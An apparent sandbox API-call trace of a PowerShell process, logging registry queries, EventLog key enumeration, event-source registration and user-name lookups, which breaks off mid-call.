RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd39c, lpData=0x1b787710, lpcbData=0xcd398*=0x56 | out: lpType=0xcd39c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd398*=0x56) returned 0x0 [0056.515] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd3cc, lpData=0x0, lpcbData=0xcd3c8*=0x0 | out: lpType=0xcd3cc*=0x1, lpData=0x0, lpcbData=0xcd3c8*=0x56) returned 0x0 [0056.515] CoTaskMemAlloc (cb=0x5a) returned 0x1b787710 [0056.515] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd39c, lpData=0x1b787710, lpcbData=0xcd398*=0x56 | out: lpType=0xcd39c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd398*=0x56) returned 0x0 [0056.524] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd3cc, lpData=0x0, lpcbData=0xcd3c8*=0x0 | out: lpType=0xcd3cc*=0x1, lpData=0x0, lpcbData=0xcd3c8*=0x56) returned 0x0 [0056.524] CoTaskMemAlloc (cb=0x5a) returned 0x1b787710 [0056.524] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd39c, lpData=0x1b787710, lpcbData=0xcd398*=0x56 | out: lpType=0xcd39c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd398*=0x56) returned 0x0 [0056.567] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd3cc, lpData=0x0, lpcbData=0xcd3c8*=0x0 | out: lpType=0xcd3cc*=0x1, lpData=0x0, lpcbData=0xcd3c8*=0x56) returned 0x0 [0056.567] CoTaskMemAlloc (cb=0x5a) returned 0x1b787710 [0056.567] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd39c, lpData=0x1b787710, lpcbData=0xcd398*=0x56 | out: lpType=0xcd39c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd398*=0x56) returned 0x0 [0056.580] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd3cc, lpData=0x0, lpcbData=0xcd3c8*=0x0 | out: lpType=0xcd3cc*=0x1, lpData=0x0, lpcbData=0xcd3c8*=0x56) returned 0x0 [0056.580] CoTaskMemAlloc (cb=0x5a) returned 0x1b787710 [0056.580] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd39c, lpData=0x1b787710, lpcbData=0xcd398*=0x56 | out: lpType=0xcd39c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd398*=0x56) returned 0x0 [0056.583] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd3cc, lpData=0x0, lpcbData=0xcd3c8*=0x0 | out: lpType=0xcd3cc*=0x1, lpData=0x0, lpcbData=0xcd3c8*=0x56) returned 0x0 [0056.583] CoTaskMemAlloc (cb=0x5a) returned 0x1b787710 [0056.583] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd39c, lpData=0x1b787710, lpcbData=0xcd398*=0x56 | out: lpType=0xcd39c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd398*=0x56) returned 0x0 [0056.592] RegQueryInfoKeyW (in: hKey=0x30c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xcd55c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd558, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xcd55c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd558*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0056.592] CoTaskMemFree (pv=0x0) [0056.593] RegEnumValueW (in: hKey=0x30c, dwIndex=0x0, lpValueName=0x2dc380, lpcchValueName=0xcd608, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0xcd608, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0056.593] RegEnumValueW (in: hKey=0x30c, dwIndex=0x1, lpValueName=0x2dc380, lpcchValueName=0xcd608, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0xcd608, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0056.593] RegEnumValueW (in: hKey=0x30c, dwIndex=0x2, lpValueName=0x2dc380, lpcchValueName=0xcd608, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0xcd608, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0056.593] RegQueryValueExW (in: hKey=0x30c, lpValueName="StackVersion", lpReserved=0x0, lpType=0xcd5ec, lpData=0x0, lpcbData=0xcd5e8*=0x0 | out: lpType=0xcd5ec*=0x1, lpData=0x0, lpcbData=0xcd5e8*=0x8) returned 0x0 [0056.593] CoTaskMemAlloc (cb=0xc) returned 0x1b795300 [0056.593] RegQueryValueExW (in: hKey=0x30c, lpValueName="StackVersion", lpReserved=0x0, lpType=0xcd5bc, lpData=0x1b795300, lpcbData=0xcd5b8*=0x8 | out: lpType=0xcd5bc*=0x1, lpData="2.0", lpcbData=0xcd5b8*=0x8) returned 0x0 [0056.605] RegQueryInfoKeyW (in: hKey=0x310, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xcd4ac, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd4a8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xcd4ac*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd4a8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0056.605] CoTaskMemFree (pv=0x0) [0056.605] CoTaskMemAlloc (cb=0x204) returned 0x2dc380 [0056.606] RegEnumValueW (in: hKey=0x310, dwIndex=0x0, lpValueName=0x2dc380, lpcchValueName=0xcd558, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0xcd558, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0056.606] RegEnumValueW (in: hKey=0x310, dwIndex=0x1, lpValueName=0x2dc380, lpcchValueName=0xcd558, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0xcd558, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0056.606] RegEnumValueW (in: hKey=0x310, dwIndex=0x2, lpValueName=0x2dc380, lpcchValueName=0xcd558, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0xcd558, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0056.606] RegQueryValueExW (in: hKey=0x310, lpValueName="StackVersion", lpReserved=0x0, lpType=0xcd53c, lpData=0x0, lpcbData=0xcd538*=0x0 | out: lpType=0xcd53c*=0x1, lpData=0x0, lpcbData=0xcd538*=0x8) returned 0x0 [0056.606] CoTaskMemAlloc (cb=0xc) returned 0x1b795160 [0056.606] RegQueryValueExW (in: hKey=0x310, lpValueName="StackVersion", lpReserved=0x0, lpType=0xcd50c, lpData=0x1b795160, lpcbData=0xcd508*=0x8 | out: lpType=0xcd50c*=0x1, lpData="2.0", lpcbData=0xcd508*=0x8) returned 0x0 [0056.607] RegQueryInfoKeyW (in: hKey=0x324, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xcd54c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd548, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xcd54c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd548*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0056.607] CoTaskMemFree (pv=0x0) [0056.607] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x0, lpName=0x2dc380, lpcchName=0xcd5d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xcd5d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0056.607] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x1, lpName=0x2dc380, lpcchName=0xcd5d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xcd5d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0056.607] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x2, lpName=0x2dc380, lpcchName=0xcd5d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xcd5d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0056.607] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x3, lpName=0x2dc380, lpcchName=0xcd5d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xcd5d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0056.607] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x4, lpName=0x2dc380, lpcchName=0xcd5d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xcd5d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0056.607] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x5, lpName=0x2dc380, lpcchName=0xcd5d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xcd5d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0056.608] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x6, lpName=0x2dc380, lpcchName=0xcd5d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xcd5d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0056.608] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x7, lpName=0x2dc380, lpcchName=0xcd5d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xcd5d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0056.608] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x8, lpName=0x2dc380, lpcchName=0xcd5d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xcd5d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0056.616] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7a0860, nSize=0xcd848 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0xcd848) returned 0x1 [0056.617] GetUserNameW (in: lpBuffer=0x2dc380, pcbBuffer=0xcd888 | out: lpBuffer="aETAdzjz", pcbBuffer=0xcd888) returned 1 [0056.617] CoTaskMemFree (pv=0x2dc380) [0056.635] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd588 | out: phkResult=0xcd588*=0x354) returned 0x0 [0056.635] RegQueryInfoKeyW (in: hKey=0x354, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xcd4fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd4f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xcd4fc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd4f8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0056.635] CoTaskMemFree (pv=0x0) [0056.635] CoTaskMemAlloc (cb=0x204) returned 0x2dc380 [0056.635] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x0, lpName=0x2dc380, lpcchName=0xcd588, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xcd588, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0056.635] CoTaskMemFree (pv=0x2dc380) [0056.635] CoTaskMemFree (pv=0x0) [0056.635] CoTaskMemAlloc (cb=0x204) returned 0x2dc380 [0056.635] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x1, lpName=0x2dc380, lpcchName=0xcd588, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xcd588, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0056.635] CoTaskMemFree (pv=0x2dc380) [0056.635] CoTaskMemFree (pv=0x0) [0056.635] CoTaskMemAlloc (cb=0x204) returned 0x2dc380 [0056.636] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x2, lpName=0x2dc380, lpcchName=0xcd588, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xcd588, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0056.636] CoTaskMemFree (pv=0x2dc380) [0056.636] CoTaskMemFree (pv=0x0) [0056.636] CoTaskMemAlloc (cb=0x204) returned 0x2dc380 [0056.636] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x3, lpName=0x2dc380, lpcchName=0xcd588, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xcd588, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0056.636] CoTaskMemFree (pv=0x2dc380) [0056.636] CoTaskMemFree (pv=0x0) [0056.636] CoTaskMemAlloc (cb=0x204) returned 0x2dc380 [0056.636] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x4, lpName=0x2dc380, lpcchName=0xcd588, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xcd588, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0056.636] CoTaskMemFree (pv=0x2dc380) [0056.636] CoTaskMemFree (pv=0x0) [0056.636] CoTaskMemAlloc (cb=0x204) returned 0x2dc380 [0056.636] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x5, lpName=0x2dc380, lpcchName=0xcd588, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xcd588, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0056.636] CoTaskMemFree (pv=0x2dc380) [0056.636] CoTaskMemFree (pv=0x0) [0056.636] CoTaskMemAlloc (cb=0x204) returned 0x2dc380 [0056.636] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x6, lpName=0x2dc380, lpcchName=0xcd588, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xcd588, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0056.636] CoTaskMemFree (pv=0x2dc380) [0056.636] CoTaskMemFree (pv=0x0) [0056.636] CoTaskMemAlloc (cb=0x204) returned 0x2dc380 [0056.636] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x7, lpName=0x2dc380, lpcchName=0xcd588, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xcd588, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0056.636] CoTaskMemFree (pv=0x2dc380) [0056.636] CoTaskMemFree (pv=0x0) [0056.636] CoTaskMemAlloc (cb=0x204) returned 0x2dc380 [0056.636] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x8, lpName=0x2dc380, lpcchName=0xcd588, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xcd588, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0056.636] CoTaskMemFree (pv=0x2dc380) [0056.636] CoTaskMemFree (pv=0x0) [0056.636] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd5e8 | out: phkResult=0xcd5e8*=0x358) returned 0x0 [0056.637] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd5e8 | out: phkResult=0xcd5e8*=0x0) returned 0x2 [0056.637] RegOpenKeyExW (in: hKey=0x354, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd5e8 | out: phkResult=0xcd5e8*=0x35c) returned 0x0 [0056.637] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd5e8 | out: phkResult=0xcd5e8*=0x0) returned 0x2 [0056.637] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd5e8 | out: phkResult=0xcd5e8*=0x360) returned 0x0 [0056.637] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd5e8 | out: phkResult=0xcd5e8*=0x0) returned 0x2 [0056.637] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd5e8 | out: phkResult=0xcd5e8*=0x364) returned 0x0 [0056.637] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd5e8 | out: phkResult=0xcd5e8*=0x0) returned 0x2 [0056.637] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd5e8 | out: phkResult=0xcd5e8*=0x368) returned 0x0 [0056.637] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd5e8 | out: phkResult=0xcd5e8*=0x0) returned 0x2 [0056.637] RegOpenKeyExW (in: hKey=0x354, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd5e8 | out: phkResult=0xcd5e8*=0x36c) returned 0x0 [0056.637] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd5e8 | out: phkResult=0xcd5e8*=0x0) returned 0x2 [0056.637] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd5e8 | out: phkResult=0xcd5e8*=0x0) returned 0x5 [0056.640] RegQueryInfoKeyW (in: hKey=0x374, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xcd4fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd4f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xcd4fc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd4f8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0056.640] CoTaskMemFree (pv=0x0) [0056.640] CoTaskMemAlloc (cb=0x204) returned 0x2dc380 [0056.640] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x0, lpName=0x2dc380, lpcchName=0xcd588, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xcd588, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0056.640] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x1, lpName=0x2dc380, lpcchName=0xcd588, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xcd588, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0056.640] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x2, lpName=0x2dc380, lpcchName=0xcd588, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xcd588, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0056.641] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x3, lpName=0x2dc380, lpcchName=0xcd588, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xcd588, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0056.641] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x4, lpName=0x2dc380, lpcchName=0xcd588, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xcd588, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0056.641] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x5, lpName=0x2dc380, lpcchName=0xcd588, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xcd588, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0056.641] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x6, lpName=0x2dc380, lpcchName=0xcd588, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xcd588, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0056.641] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x7, lpName=0x2dc380, lpcchName=0xcd588, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xcd588, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0056.641] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x8, lpName=0x2dc380, lpcchName=0xcd588, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xcd588, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0056.642] RegQueryInfoKeyW (in: hKey=0x390, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xcd4cc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd4c8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xcd4cc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd4c8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0056.643] CoTaskMemFree (pv=0x0) [0056.643] CoTaskMemAlloc (cb=0x204) returned 0x2dc380 [0056.643] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x0, lpName=0x2dc380, lpcchName=0xcd558, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xcd558, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0056.643] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x1, lpName=0x2dc380, lpcchName=0xcd558, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xcd558, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0056.643] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x2, lpName=0x2dc380, lpcchName=0xcd558, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xcd558, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0056.643] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x3, lpName=0x2dc380, lpcchName=0xcd558, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xcd558, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0056.643] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x4, lpName=0x2dc380, lpcchName=0xcd558, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xcd558, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0056.643] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x5, lpName=0x2dc380, lpcchName=0xcd558, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xcd558, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0056.643] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x6, lpName=0x2dc380, lpcchName=0xcd558, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xcd558, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0056.643] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x7, lpName=0x2dc380, lpcchName=0xcd558, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xcd558, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0056.643] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x8, lpName=0x2dc380, lpcchName=0xcd558, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xcd558, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0056.648] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b880008 [0056.650] ReportEventW (hEventLog=0x1b880008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3c3a8c0*="WSMan", lpRawData=0x3c3a630) returned 1 [0056.652] CoTaskMemAlloc (cb=0x104) returned 0x32a5c0 [0056.652] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32a5c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0056.652] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7a10c0, nSize=0xcd848 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0xcd848) returned 0x1 [0056.653] GetUserNameW (in: lpBuffer=0x2dc380, pcbBuffer=0xcd888 | out: lpBuffer="aETAdzjz", 